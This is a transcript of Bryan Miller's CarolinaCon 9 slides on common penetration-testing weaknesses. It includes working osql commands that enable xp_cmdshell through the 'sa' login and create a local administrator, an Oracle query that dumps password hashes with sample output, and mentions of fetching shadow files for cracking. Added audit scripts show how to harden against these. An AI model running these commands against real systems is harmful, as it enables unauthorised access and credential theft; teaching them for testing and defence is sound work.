CarolinaCon 9: The Low Hanging Fruit of Penetration Testing, presented by Bryan Miller

Post on 15-Jan-2016


TRANSCRIPT

CarolinaCon 9

The Low Hanging Fruit of Penetration Testing

Presented by:

Bryan Miller

Agenda

Pen Testing vs. VA vs. Risk Assessments

Penetration Testing Concepts/Issues

What is Low Hanging Fruit?

Low Hanging Fruit Examples

Wrap Up

3/16/2013

B.S. I.S., M.S. C.S. – Virginia Commonwealth University

Current CISSP, former Banyan CBE & Cisco CCIE

Former adjunct professor – I.S. & C.S. – VCU

ISSA, ISACA, IALR and VA SCAN lecturer

Penetration testing for 11+ years

Published author with 25 years in I.T.

Penetration Testing vs. Vulnerability Assessments vs. Risk Assessments

Penetration Testing: Tests for actual vulnerabilities and what can be exploited. The value add comes from putting the pieces together.

Vulnerability Assessment: Reports on potential vulnerabilities without testing them. Assigns risk values to each issue.

Risk Assessment: More analytical and less technical. Great for overviews, but IMHO it will never catch LHF.

Penetration Testing Concepts/Issues

Types of testing

External: Testing from outside the security perimeter (firewall). Covers Internet, dial-in, wireless, physical & social engineering. Usually performed in a black-box approach with no credentials.

Internal: What is accessible inside the security perimeter. White-box or black-box depending on goals. Tests for the effects of automated malicious software.


Issues - Requirements definition

Do you need a penetration test, VA or risk assessment? Sometimes you may need more than one.

What is the ultimate goal of the test?

Physical → test security cameras, locks and alarms

Social engineering → test HR policies and procedures

Vulnerability assessment → patch scan

How do you define success? How do you know if the test succeeded or failed? This is sometimes difficult to define for a penetration test.


Issues - In-house or outsourced?

In-house: Keeping qualified staff happy is a tough job. Tools and training can be very expensive. Sometimes you just need an unbiased 2nd opinion.

Outsourced: How do you judge competency? Do they have a methodology, tool list, references? Do they outsource their work? What is their geography/vertical market coverage?


Issues

Deliverables: Will the report include specific recommendations? Is there tool output for verification? No boilerplate text!

Remediation: If you don't plan on fixing the issues, don't waste the time or money performing the tests.

Post-remediation testing: Critical to ensure that all issues have been resolved.

What is Low Hanging Fruit?

The Low Hanging Fruit Top Ten

1. Password management

2. Default security controls

3. OS and application patches

4. SQL Injection, XSS, URL issues

5. Wireless access points/modems

6. Permissions on data resources

7. Employee security awareness

8. Encryption

9. Policies & procedures

10. Physical security

Low Hanging Fruit Examples

Fun with Microsoft SQL

Turn on "xp_cmdshell" if it's disabled:

1. osql -S 10.1.1.1 -U sa -P pwd -Q "EXECUTE master.dbo.sp_configure 'show advanced options', 1"

2. osql -S 10.1.1.1 -U sa -P pwd -Q "RECONFIGURE"

3. osql -S 10.1.1.1 -U sa -P pwd -Q "EXECUTE master.dbo.sp_configure 'xp_cmdshell', 1"

4. osql -S 10.1.1.1 -U sa -P pwd -Q "RECONFIGURE"


More Fun with Microsoft SQL

Add administrative user:

1. osql -S 10.1.1.1 -U sa -P pwd -Q "EXECUTE xp_cmdshell 'net user bmiller passwd /add'"

2. osql -S 10.1.1.1 -U sa -P pwd -Q "EXECUTE xp_cmdshell 'net localgroup administrators bmiller /add'"
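The two SQL Server slides above only work because the 'sa' login is usable and xp_cmdshell can be switched on. As an added defender-side counterpart (not part of the talk), this T-SQL audit checks those same conditions on an instance and turns xp_cmdshell back off; it assumes a sysadmin connection to SQL Server 2005 or later, where sys.configurations, sys.sql_logins and PWDCOMPARE exist.

```sql
-- Added audit script, not from the talk. Run as a sysadmin on the
-- instance under review; every value it reports is that instance's own.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means any sysadmin-level
--    login can run OS commands exactly as the slides show.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. Which SQL logins hold sysadmin, and are any of them blank-password
--    or exempt from the password policy? PWDCOMPARE returns 1 when the
--    stored hash matches the supplied password ('' = blank).
SELECT name,
       is_disabled,
       is_policy_checked,
       PWDCOMPARE('', password_hash)       AS has_blank_password,
       IS_SRVROLEMEMBER('sysadmin', name)  AS is_sysadmin
FROM sys.sql_logins
ORDER BY is_sysadmin DESC, name;

-- 3. Is SQL authentication needed at all? 1 = Windows authentication only,
--    which removes the 'sa'/password guessing path entirely.
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly') AS windows_auth_only;

-- 4. Remediation: disable xp_cmdshell again and hide the advanced options.
--    'show advanced options' must be on to change xp_cmdshell at all.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 5. If SQL authentication must stay, at least keep 'sa' out of reach.
ALTER LOGIN sa DISABLE;
```

Re-running step 1 after the RECONFIGURE calls should show value_in_use = 0 for both rows; a non-zero value that reappears later is worth alerting on, since enabling xp_cmdshell is also logged by the default server trace.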

The Trouble with VNC

There are many ways to get the VNC password hashes…


Fun with Oracle

Dumping password hashes – non-privileged account

1. Logged in as "dbsnmp", we ran the following query:

select username, password from dba_users;

DBSNMP  AE1E40C725DFCAC8
AQADMIN 739EF27E22AC39DC
SYS     C10A280B9CFF9A72
SYSTEM  04D19DEFD642AF20


2. Ran CheckPWD:
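The Oracle slide depends on two things: DBSNMP still having its vendor default password, and a low-privilege account being able to read DBA_USERS. As an added defender-side audit (not from the talk), the script below checks both and locks the default account; it assumes a DBA connection to Oracle 11g or later, where DBA_USERS_WITH_DEFPWD exists (on 11g+ the DBA_USERS.PASSWORD column is blank and the hashes live in SYS.USER$, so dictionary access still matters).

```sql
-- Added audit script, not from the talk. Run as a DBA; all views used
-- are standard Oracle data-dictionary views (11g or later).

-- 1. Accounts still on a vendor default password (DBSNMP, SYSTEM, ...),
--    together with whether they are even open.
SELECT d.username, u.account_status
FROM   dba_users_with_defpwd d
JOIN   dba_users u ON u.username = d.username
ORDER  BY d.username;

-- 2. Who can read the data dictionary? Any of these grants lets a
--    "non-privileged" login query DBA_USERS (or SYS.USER$) as in the slide.
SELECT grantee, privilege AS grant_name, 'SYS PRIV' AS kind
FROM   dba_sys_privs
WHERE  privilege IN ('SELECT ANY DICTIONARY', 'SELECT ANY TABLE')
UNION ALL
SELECT grantee, granted_role, 'ROLE'
FROM   dba_role_privs
WHERE  granted_role IN ('SELECT_CATALOG_ROLE', 'DBA')
ORDER  BY 1, 2;

-- 3. With O7_DICTIONARY_ACCESSIBILITY = TRUE, plain SELECT ANY TABLE also
--    reaches SYS-owned tables such as USER$. FALSE is the safe default.
SELECT name, value
FROM   v$parameter
WHERE  name = 'O7_DICTIONARY_ACCESSIBILITY';

-- 4. Remediation for an unused monitoring account: lock it and expire the
--    password so the default credential stops working. If Enterprise
--    Manager needs DBSNMP, rotate the password instead of locking it.
ALTER USER dbsnmp ACCOUNT LOCK PASSWORD EXPIRE;
```

Step 1 returning zero rows and step 2 listing only DBA-type accounts is the target state; anything else is exactly the low hanging fruit the slide is about.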


Reboot via Compaq Insight Manager (CIM)


Appliances are not immune….


Downloaded passwd, shadow, host files


Looks like we can request any file?


OK, we'll ask for the password file. Next up, JTR!


This is why PCI doesn’t allow WEP


What the fake telephone repairman saw…


The danger of scripts laying around…

Wrap-Up

Data breaches affect your organization’s reputation and can cost you money.

Software is becoming more complex while attacker tools are becoming easier to use.

Data breaches can be reduced by following best practice rules to eliminate LHF.


Remember the 3 P’s:

Policies & Procedures

Password Management

Patching


Q&A

Bryan Miller

bryan@syrinxtech.com
